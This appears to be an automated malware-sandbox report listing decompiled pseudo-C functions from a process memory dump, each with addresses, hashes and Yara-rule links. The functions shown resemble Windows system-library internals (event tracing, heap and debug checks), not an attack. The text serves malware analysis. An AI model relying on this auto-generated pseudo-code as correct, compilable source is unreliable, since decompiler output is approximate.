					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E053DB640(E053D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0544fec0
0x0544fec0
0x0544fecf
0x0544fed9
0x0544fede
0x0544fee0
0x0544feeb
0x0544fef3
0x0544fef6
0x0544fef9
0x0544ff04
0x0544ff16
0x0544ff06
0x0544ff0f
0x0544ff0f
0x0544ff21
0x0544ff22
0x0544ff24
0x0544ff29
0x0544ff3e

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee5d59def2d30610b3f023264d1216e0e4f3da8d46374f15f5660d432fb45dee
Instruction ID: c9c6c6094fb9fe20fd745a23534c326b26e7b1bb9bafed91e8628bcaf281b205
Opcode Fuzzy Hash: ee5d59def2d30610b3f023264d1216e0e4f3da8d46374f15f5660d432fb45dee
Instruction Fuzzy Hash: 20018871F01258AFD714DB69E845FAFB7B8EF45700F04406AB9019B380D9749901CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05468A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E05468A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x548d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E053B7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E053DB640(E053D9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x05468a62
0x05468a71
0x05468a79
0x05468a82
0x05468a85
0x05468a89
0x05468a8c
0x05468a8f
0x05468a92
0x05468a95
0x05468a9f
0x05468ab1
0x05468aa1
0x05468aaa
0x05468aaa
0x05468abc
0x05468abd
0x05468abf
0x05468ac4
0x05468ada

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1528acb0a60e2ce8742968dcae55bdd38be94e136e3716ce48409123e45dc7f9
Instruction ID: 9f6e1a157e9828df52632f4072452189451ca0095a6b7b850c8bd2b1fb00d543
Opcode Fuzzy Hash: 1528acb0a60e2ce8742968dcae55bdd38be94e136e3716ce48409123e45dc7f9
Instruction Fuzzy Hash: BA012176A0121C9FCB04DFA9D945AEEB7F8FF48350F10405AF905E7341D634A901CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05468ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E05468ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x548d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E053B7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E053DB640(E053D9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x05468ed6
0x05468ee5
0x05468eed
0x05468ef0
0x05468efa
0x05468f03
0x05468f0c
0x05468f15
0x05468f24
0x05468f27
0x05468f31
0x05468f43
0x05468f33
0x05468f3c
0x05468f3c
0x05468f4e
0x05468f4f
0x05468f51
0x05468f56
0x05468f69

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a8d6eb875a725b0be988d4cdbb0343a297ea1438cb2067da9ccab2ecbc2626a
Instruction ID: febbffd67dd165d11e20fb58cad3be0c74374e9b1fba8e36af72ffb5cf7bed97
Opcode Fuzzy Hash: 3a8d6eb875a725b0be988d4cdbb0343a297ea1438cb2067da9ccab2ecbc2626a
Instruction Fuzzy Hash: 5A112D71E042199FDB04DFA8D445BAEFBF4FF08300F0442AAE919EB782E6349940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0539DB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0539DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0539DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0539E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0539E8B0(__ecx, _t14, 0xfff);
							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x0539db64
0x0539db66
0x0539db6b
0x0539dbaa
0x0539db71
0x0539db76
0x0539db7a
0x0539dba3
0x0539db7c
0x0539db87
0x0539db8b
0x053f4fa1
0x053f4fb3
0x053f4fb8
0x0539db91
0x0539db96
0x0539db98
0x0539db98
0x0539db8b
0x0539db7a
0x0539db9d
0x0539dba2

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 79f39a092f473413b36a83664e03adfab2cbecafd69d9e5ce2dd2aaaa90ffa06
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 71F0FCB33056229BEF36AA954895F67B69A9FC1A60F150835F2069B744C9B08C0297E1

Uniqueness

Uniqueness Score: -1.00%

Function 0539B1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0539B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E053B7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E053B7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E05417016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x0539b1e8
0x0539b1ea
0x0539b1f3
0x053f4a17
0x0539b1f9
0x0539b1f9
0x0539b1f9
0x0539b201
0x053f4a21
0x053f4a2e
0x00000000
0x00000000
0x053f4a3b
0x053f4a4d
0x053f4a3d
0x053f4a46
0x053f4a46
0x053f4a55
0x00000000
0x00000000
0x00000000
0x0539b20a
0x0539b20a
0x0539b20a
0x0539b20a

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: eea0b575996edcbb98b8ecdef6cc1888d7187eafd8c8538efed917bcec759424
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: F201A9323046809BDF26975DD808F6AFB99FF81794F094465FA558BAB1D6B9C800C325

Uniqueness

Uniqueness Score: -1.00%

Function 0542FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0542FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x548d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E053B7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E053DB640(E053D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0542fe96
0x0542fe9e
0x0542fea1
0x0542fead
0x0542feb3
0x0542feb9
0x0542fec3
0x0542fed5
0x0542fec5
0x0542fece
0x0542fece
0x0542fee0
0x0542fee1
0x0542fee3
0x0542fee8
0x0542fefb

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00f9083b4685a12bdf8ccd4c17888ab1c52d64607880dc806c3a9162530bcc75
Instruction ID: 9928f5079a8d64122854e11bac5538eeada6b9ad2c6221bf29a222c544cb7e39
Opcode Fuzzy Hash: 00f9083b4685a12bdf8ccd4c17888ab1c52d64607880dc806c3a9162530bcc75
Instruction Fuzzy Hash: C0016271A04218AFCB14DFA8D546AAEB7F4FF04300F504199B505DB382DA35D901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05468F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E05468F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x548d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E053B7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E053DB640(E053D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x05468f6a
0x05468f79
0x05468f81
0x05468f84
0x05468f8b
0x05468f91
0x05468f94
0x05468f9e
0x05468fb0
0x05468fa0
0x05468fa9
0x05468fa9
0x05468fbb
0x05468fbc
0x05468fbe
0x05468fc3
0x05468fd6

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7834fb1d9539118fc8c82fd731f35e194151d666b037e819c379aba694f3bd64
Instruction ID: 9a0c0296aa6fc6219e06552754cf792f1d8615550184ee2c14809148adb5a81a
Opcode Fuzzy Hash: 7834fb1d9539118fc8c82fd731f35e194151d666b037e819c379aba694f3bd64
Instruction Fuzzy Hash: 5D013C75A05209AFDB04EFA8E545AAEB7F4EF48300F10445AB905EB381EA74DA00CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0545131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0545131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x548d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E053B7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E053DB640(E053D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0545131b
0x0545132a
0x05451330
0x05451336
0x0545133e
0x05451341
0x05451344
0x0545134f
0x05451361
0x05451351
0x0545135a
0x0545135a
0x0545136c
0x0545136d
0x0545136f
0x05451374
0x05451387

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33f9a4ffe3b46e3d1176cf51f25b25dc24d0768939e88b5f27373df2bbd2aab1
Instruction ID: b06edc6a0470a932f52411207385fa07e482eb4b1d892c7553ad67817d7896b9
Opcode Fuzzy Hash: 33f9a4ffe3b46e3d1176cf51f25b25dc24d0768939e88b5f27373df2bbd2aab1
Instruction Fuzzy Hash: CD013C71E05208AFDB04EFA9D559AAEB7F4FF48700F00406ABD45EB381EA749A00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 053BC577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053BC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E053BC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x53711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E054688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x053bc577
0x053bc57d
0x053bc581
0x053bc5b5
0x053bc5b9
0x053bc5ce
0x053bc5ce
0x053bc5ca
0x00000000
0x053bc5ca
0x053bc5c4
0x053bc5c8
0x00000000
0x00000000
0x00000000
0x053bc5ad
0x00000000
0x053bc5af

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7de93b34cffb4d1df37df8be95e5d57f09944cf0f213a9d6bdba2e2fbb1f0e0
Instruction ID: acd1fb3b155f1634b86dd27c3739841c9219c646bb259acd90c886ae743916df
Opcode Fuzzy Hash: c7de93b34cffb4d1df37df8be95e5d57f09944cf0f213a9d6bdba2e2fbb1f0e0
Instruction Fuzzy Hash: C9F0B4B291569E9FF731CB16C04CFE27BE9AB05670F44A467D70687D01C6E4DE84C251

Uniqueness

Uniqueness Score: -1.00%

Function 05468D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E05468D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x548d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E053B7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E053DB640(E053D9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x05468d34
0x05468d43
0x05468d4b
0x05468d4e
0x05468d52
0x05468d5c
0x05468d6e
0x05468d5e
0x05468d67
0x05468d67
0x05468d79
0x05468d7a
0x05468d7c
0x05468d81
0x05468d94

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8d1214610819eddd1b958ebf464b8edafee1e0f999e2d62c53eb1289db8298a
Instruction ID: f0d310295ee4c3d36db34c681d6c1349aa8bbcdda2ce9b6120341066a9cd3d22
Opcode Fuzzy Hash: d8d1214610819eddd1b958ebf464b8edafee1e0f999e2d62c53eb1289db8298a
Instruction Fuzzy Hash: EFF05471F046089FD714EFB8E545BAEB7B4EF54700F508499E905EB391DA34D900CB65

Uniqueness

Uniqueness Score: -1.00%

Function 05452073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E05452073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0544FD22(__ecx);
				_t19 =  *0x548849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x5488748; // 0x0
					if(__eflags <= 0) {
						E05451C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x5488724 & 0x00000004;
							if(( *0x5488724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x5488724; // 0x0
					return E05448DF1(__ebx, 0xc0000374, 0x5485890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x05452076
0x05452078
0x0545207d
0x05452083
0x054520a4
0x054520aa
0x054520ac
0x054520b7
0x054520ba
0x054520bc
0x054520c9
0x054520c9
0x054520d0
0x054520d2
0x00000000
0x054520d2
0x054520be
0x054520c3
0x054520c5
0x054520c7
0x00000000
0x00000000
0x054520c7
0x054520bc
0x054520d4
0x05452085
0x05452085
0x054520a3
0x054520a3

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b8b6fe7c62b57e3b4c5c6c260b55ef6ba87ce1930aa1edc407dc11256661e0f
Instruction ID: 7f6d6a750f391d79cf3b4afe2619a443c8fd5c6378646cf18de8f4260267be78
Opcode Fuzzy Hash: 5b8b6fe7c62b57e3b4c5c6c260b55ef6ba87ce1930aa1edc407dc11256661e0f
Instruction Fuzzy Hash: 50F02E7E52B58457DE3A5B2524057F67FA2E745520F4908CBED5227302C9744443CA10

Uniqueness

Uniqueness Score: -1.00%

Function 053D927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E053D927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E053DFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E053D92C6(_t11, _t14);
				}
				return _t11;
			}

0x053d9295
0x053d9299
0x053d929f
0x053d92aa
0x053d92ad
0x053d92ae
0x053d92af
0x053d92b0
0x053d92b4
0x053d92bb
0x053d92bb
0x053d92c5

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: bddd59259a9406528068faf0f45a999bf8b90087c31d9eb01d0ce07844a52a71
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 7BE09B337405406BE7119E55DCC4F57777DEF82721F044079B5055E242C6E6DD0987B4

Uniqueness

Uniqueness Score: -1.00%

Function 053B746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E053B746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E053AEB70(__ecx, 0x54879a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E053D95D0();
							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x053b746d
0x053b746d
0x053b746d
0x053b7471
0x053b7488
0x053ff92d
0x053b748e
0x053b7491
0x053b7495
0x053ff937
0x053ff93a
0x053ff94e
0x053ff953
0x053ff956
0x053ff956
0x053b7495
0x00000000
0x053b7488
0x053b7473
0x053b7478
0x053b747d
0x053b7481
0x00000000
0x053b7481
0x053b747d
0x053b747a
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d42a21fe9df7993b48c0beda41ea3465cd1a643b1e6b3effc127f336c815c55
Instruction ID: 9aed1bbb832114d977858b7e79a581720429394bcad88f403edb78c24dc2f289
Opcode Fuzzy Hash: 8d42a21fe9df7993b48c0beda41ea3465cd1a643b1e6b3effc127f336c815c55
Instruction Fuzzy Hash: 5DF0B435608144AAEF01D768C840FFABB76FF84251F140255DA62AB950E7E598118786

Uniqueness

Uniqueness Score: -1.00%

Function 05468CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E05468CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x548d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E053B7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E053DB640(E053D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x05468ce5
0x05468ced
0x05468cf0
0x05468cfb
0x05468d0d
0x05468cfd
0x05468d06
0x05468d06
0x05468d18
0x05468d19
0x05468d1b
0x05468d20
0x05468d33

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5671ae9c6cfe20a0af0bcf18df0c61f61588a553501cae657cb57ca1d91d0ad3
Instruction ID: 916c0fedb1bffc90fbd696a17443095ef2994819728db90fb6a15f0027614612
Opcode Fuzzy Hash: 5671ae9c6cfe20a0af0bcf18df0c61f61588a553501cae657cb57ca1d91d0ad3
Instruction Fuzzy Hash: 79F08971A051089FDB04DBB8E945EAEB7B4EF49200F100199F515EB3C0D934D900C765

Uniqueness

Uniqueness Score: -1.00%

Function 05394F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05394F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E054688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E053BC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x5371030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x05394f2e
0x05394f34
0x05394f38
0x053f0b85
0x053f0b85
0x053f0b89
0x053f0b9a
0x053f0b9a
0x053f0b9f
0x00000000
0x053f0b9f
0x053f0b94
0x053f0b98
0x00000000
0x00000000
0x00000000
0x053f0b98
0x05394f3e
0x05394f48
0x00000000
0x05394f6e
0x00000000
0x05394f70

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
